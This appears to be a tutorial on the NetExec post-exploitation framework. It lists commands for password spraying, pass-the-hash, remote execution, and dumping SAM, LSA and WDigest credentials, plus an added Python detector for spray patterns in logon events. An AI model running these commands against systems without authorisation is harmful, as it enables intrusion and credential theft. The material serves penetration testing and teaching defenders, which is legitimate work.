NetExec:

NetExec (formerly known as CrackMapExec or CME) is a powerful post-exploitation framework used by penetration testers and red teamers to automate the enumeration and exploitation of network protocols, particularly in Active Directory environments.

It’s the tool you reach for when you have credentials and want to move fast — from validating access to enumerating shares, executing commands, dumping secrets, and even pivoting laterally.

NetExec is a network situational awareness tool designed to simplify common tasks during internal pentests. It supports protocols like:

  • SMB (445)
  • WinRM (5985/5986)
  • RDP (3389)
  • MSSQL (1433)
  • SSH (22)
  • LDAP (389/636)
  • Kerberos (88)
  • and more…

It allows for credential validation, command execution, file uploads, password spraying, and more — across an entire subnet.

Think of it as a Swiss Army knife for Windows network protocols.

NetExec is a community-driven fork and complete rewrite of CrackMapExec (CME). While CME was incredibly popular, it is now deprecated and unmaintained.

Why the change?

  • The name CrackMapExec triggered antivirus and firewall detections and ran into policy issues because of the word “crack.”
  • The project slowed down and lacked modern protocol support.
  • NetExec was created to revive, modernize, and extend everything CME did — but faster, cleaner, and actively supported.

If you’ve used CME in the past, switching to NetExec is seamless — same syntax, but with more speed and more features.

# Recommended install via pipx
pipx install git+https://github.com/Pennyw0rth/NetExec

# Or clone and install locally
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install .

# Basic syntax
netexec <protocol> <target> -u <user> -p <password>

Examples:

# Check if credentials work via SMB
netexec smb 10.10.10.0/24 -u administrator -p Passw0rd!

# Check WinRM access
netexec winrm 10.10.10.5 -u jdoe -p Summer2024

# Use hash instead of password
netexec smb 10.10.10.5 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

NetExec uses modules to perform specific actions once it authenticates.

You can list available modules like this:

netexec smb -L

Then run a module:

netexec smb 10.10.10.5 -u admin -p password123 -M shares

Popular modules include:

  • shares – List accessible SMB shares
  • sessions – See logged-in users
  • exec – Execute a command
  • psexec – Run commands via service creation
  • sam – Dump local SAM hashes
  • lsa – Dump LSA secrets
  • wdigest – Dump plaintext creds from memory
  • kerberos – Kerberos ticket abuse (AS-REP, Kerberoasting)
  • winrm_exec – Run PowerShell via WinRM

# Enumerate shares
netexec smb 10.10.10.5 -u user -p pass -M shares

# Command execution (if user has admin)
netexec smb 10.10.10.5 -u user -p pass -M exec -o COMMAND="whoami"

# Dump SAM
netexec smb 10.10.10.5 -u user -p pass -M sam

# Dump LSA secrets
netexec smb 10.10.10.5 -u user -p pass -M lsa

# Dump plaintext credentials (Wdigest)
netexec smb 10.10.10.5 -u user -p pass -M wdigest

# Password spray across 192.168.1.0/24
netexec smb 192.168.1.0/24 -u admin -p Welcome123!

# Spray with user and password lists
netexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Add --continue-on-success if you want to keep spraying after finding valid creds.
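
Seen from the defender's side, a spray or subnet-wide credential check like the ones above shows up as one source generating failed logons against many hosts or many accounts in a short time. The following is an added example, not part of NetExec or the original article: the record layout, the thresholds, and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed look-back window
MIN_HOSTS = 4                  # assumed threshold: distinct target hosts
MIN_USERS = 4                  # assumed threshold: distinct accounts

def t(clock):
    return datetime.strptime(clock, "%H:%M:%S")

# Constructed failed-logon records (timestamp, source IP, target host, account),
# shaped like fields pulled from Windows event 4625. Not real data.
SAMPLE_EVENTS = (
    # one account tried against many hosts in seconds
    [(t(f"09:00:0{i}"), "192.168.1.50", f"192.168.1.{10 + i}", "admin") for i in range(6)]
    # many accounts tried against one host
    + [(t(f"09:10:0{i}"), "192.168.1.77", "192.168.1.5", f"user{i}") for i in range(5)]
    # a user mistyping a password: one host, one account
    + [(t(f"09:20:0{i}"), "192.168.1.23", "192.168.1.5", "jdoe") for i in range(3)]
    # four hosts, but 15 minutes apart
    + [(t(f"10:{i * 15:02d}:00"), "192.168.1.90", f"192.168.1.{20 + i}", "svc") for i in range(4)]
)

def detect_sweeps(events, window=WINDOW, min_hosts=MIN_HOSTS, min_users=MIN_USERS):
    """Map each source IP to the thresholds its failures crossed inside any window."""
    by_src = defaultdict(list)
    for ts, src, host, user in sorted(events):
        by_src[src].append((ts, host, user))
    alerts = {}
    for src, rows in by_src.items():
        reasons, start = set(), 0
        for end in range(len(rows)):
            # slide the window start forward until it spans at most `window`
            while rows[end][0] - rows[start][0] > window:
                start += 1
            hosts = {h for _, h, _ in rows[start:end + 1]}
            users = {u for _, _, u in rows[start:end + 1]}
            if len(hosts) >= min_hosts:
                reasons.add("many-hosts")
            if len(users) >= min_users:
                reasons.add("many-accounts")
        if reasons:
            alerts[src] = sorted(reasons)
    return alerts

if __name__ == "__main__":
    for src, why in detect_sweeps(SAMPLE_EVENTS).items():
        print(src, why)
```

The window and thresholds need tuning against the environment's normal failed-logon baseline; the fourth sample source is only flagged when the window is widened to an hour.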

Quickly check if a credential works across many systems:

netexec smb 192.168.1.0/24 -u corpuser -p Winter2024! --shares

Or validate hashes:

netexec smb 192.168.1.0/24 -u corpuser -H :8846f7eaee8fb117ad06bdd830b7586c

# Execute PowerShell over WinRM
netexec winrm 10.10.10.5 -u jsmith -p P@ssword1 -M exec -o COMMAND='ipconfig'

This is useful in environments where SMB is noisy or locked down.

NetExec supports output in different formats:

--output output.csv --output-format csv

JSON and greppable formats are also supported.

  • Combine NetExec with Kerbrute, GetNPUsers.py, and BloodHound for full AD coverage.
  • Use --local-auth for local admin credential checks.
  • Start with enumeration modules like shares, sessions, and users, then move to execution.
  • Use --no-bruteforce to reduce noise during engagements.

NetExec replaces CrackMapExec as the modern, flexible, and actively maintained framework for internal network exploitation. With wide protocol support, powerful modules, and clean output, it’s a must-have tool in any pentester’s arsenal.

If you’re still using CME — upgrade. NetExec is faster, cleaner, and built for the environments we face today.
